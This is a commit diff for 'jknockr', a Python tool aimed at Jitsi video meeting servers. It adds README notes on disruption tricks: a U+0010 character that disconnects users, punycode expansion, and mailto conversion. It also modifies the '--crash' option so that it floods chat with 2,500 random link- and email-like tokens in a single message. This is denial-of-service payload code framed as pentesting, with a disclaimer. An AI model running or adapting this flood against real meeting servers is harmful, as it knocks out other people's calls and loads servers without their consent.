Added interesting finds when pentesting Jitsi and added mailto link usage in --crash

This commit is contained in:
Dionysus 2024-10-12 22:50:35 -04:00
parent 44e79eef56
commit 29ecb16fdc
Signed by: acidvegas
GPG Key ID: EF4B922DB85DC9DE
2 changed files with 6 additions and 5 deletions

View File

@ -72,9 +72,10 @@ python3 jknockr.py <target> [options]
- **Server Impact:** Running this script can significantly impact server performance. Monitor your server resources during testing.
- **Legal Responsibility:** You are responsible for ensuring that your use of this script complies with all applicable laws and terms of service.
## Disclaimer
The developer provides this script "as is" without any warranties. Use it at your own risk. The developer is not responsible for any damage or misuse of this script.
## Interesting Finds
- Sending a [U+0010](https://unicode-explorer.com/c/0010) character disconnects you from the room. Same with using as your name.
- Unicode in a URL is converted to puny code. *(`𓆨.中国` only 4 characters you send to the chat & itll convert to `xn--907d.xn--fiqs8s`)*
- Using @ in a URL converts it to a `mailto://`
___

View File

@ -155,7 +155,7 @@ def client_join(client_id: int, tlds: list, args: argparse.Namespace, video_id:
if not tlds:
print(f'Client {client_id}: TLD list is empty. Using default TLDs.')
tlds = ['com', 'net', 'org', 'info', 'io']
msg = ' '.join(f'{random_word(5)}.{random.choice(tlds)}' for _ in range(2500))
msg = ' '.join( f'{random_word(2)}@{random_word(2)}.{random.choice(tlds)}' if random.choice([True,False]) else f'{random_word(4)}.{random.choice(tlds)}' for _ in range(2500))
elif args.message:
msg = args.message
message_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>
@ -267,4 +267,4 @@ def random_word(length: int) -> str:
if __name__ == '__main__':
force_ipv4()
main()
main()